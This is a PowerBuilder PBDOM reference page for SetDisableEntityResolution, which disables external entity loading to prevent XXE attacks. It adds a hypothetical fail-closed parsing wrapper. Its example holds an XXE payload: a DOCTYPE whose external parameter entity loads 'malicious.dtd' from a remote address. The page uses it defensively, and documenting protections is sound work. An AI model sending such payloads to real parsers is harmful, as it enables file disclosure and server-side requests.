SetDisableEntityResolution

Description

Disables the loading of external entities. This method helps prevent XML eXternal Entity (XXE) attacks by not loading the external entities referenced in the XML document.

Syntax

pbdom_builder_name.SetDisableEntityResolution(boolean bDisableEntityResolution)

Argument                    Description

pbdom_builder_name          The name of a PBDOM_BUILDER object.

bDisableEntityResolution    A boolean specifying whether loading of external entities is allowed.
                            True -- Not allowed to load the external entity.
                            False -- (Default) Allowed to load the external entity.


Return value

None.

Examples

The code in this example attempts to disable the loading of an external entity referenced in the XML document.

pbdom_builder pbbuilder
string ls_xml

pbbuilder = create pbdom_builder
// Disable external entity loading before the document is parsed
pbbuilder.SetDisableEntityResolution(true)

// The DOCTYPE declares an external parameter entity (%xxe) that references a remote DTD
ls_xml = '<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM  "http://172.16.9.100/malicious.dtd"> %xxe;]><Something>test</Something>'

pbbuilder.BuildFromString(ls_xml)

Usage

The SetDisableEntityResolution method can be used to disable the loading of external entities, so as to prevent potential XML eXternal Entity (XXE) vulnerabilities.

With the Apache Xerces C++ parser, even when SetDisableEntityResolution is set to True, Xerces still checks whether the URL exists and displays an error if the URL does not exist.
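
One way to wrap the call when the XML comes from an untrusted source, so that the parser error described above is caught and the document is rejected instead of being used. This is an added example, not code from the PowerBuilder documentation; the function name f_parse_untrusted_xml and its arguments are hypothetical.

```powerscript
// Added example (hypothetical helper, not part of PBDOM).
// Parses as_xml with external entity loading disabled and fails closed:
// the caller gets a valid PBDOM_DOCUMENT only if the parser reported no errors.
// On rejection the returned reference is not valid and as_error holds the reason.
global function pbdom_document f_parse_untrusted_xml (string as_xml, ref string as_error)

pbdom_builder  lpb_builder
pbdom_document lpb_doc
pbdom_document lpb_result   // left unassigned unless parsing is clean
string         ls_errors[]
long           ll_i

as_error = ""

TRY
	lpb_builder = CREATE pbdom_builder

	// Must be set before parsing: the default (False) allows external entities.
	lpb_builder.SetDisableEntityResolution(TRUE)

	lpb_doc = lpb_builder.BuildFromString(as_xml)

	// Collect fatal and nonfatal errors from the last parse, for example the
	// Xerces error raised when a referenced URL does not exist.
	lpb_builder.GetParseErrors(ls_errors)
	FOR ll_i = 1 TO UpperBound(ls_errors)
		as_error += ls_errors[ll_i] + "~r~n"
	NEXT

	// Hand the document back only when nothing was reported.
	IF UpperBound(ls_errors) = 0 THEN
		lpb_result = lpb_doc
	END IF
CATCH (PBDOM_EXCEPTION lpbe)
	// Parsing was aborted; report the message and return no document.
	as_error = lpbe.GetMessage()
FINALLY
	IF IsValid(lpb_builder) THEN DESTROY lpb_builder
END TRY

RETURN lpb_result

end function
```

The caller should test the result with IsValid() before use and log as_error when the document is rejected.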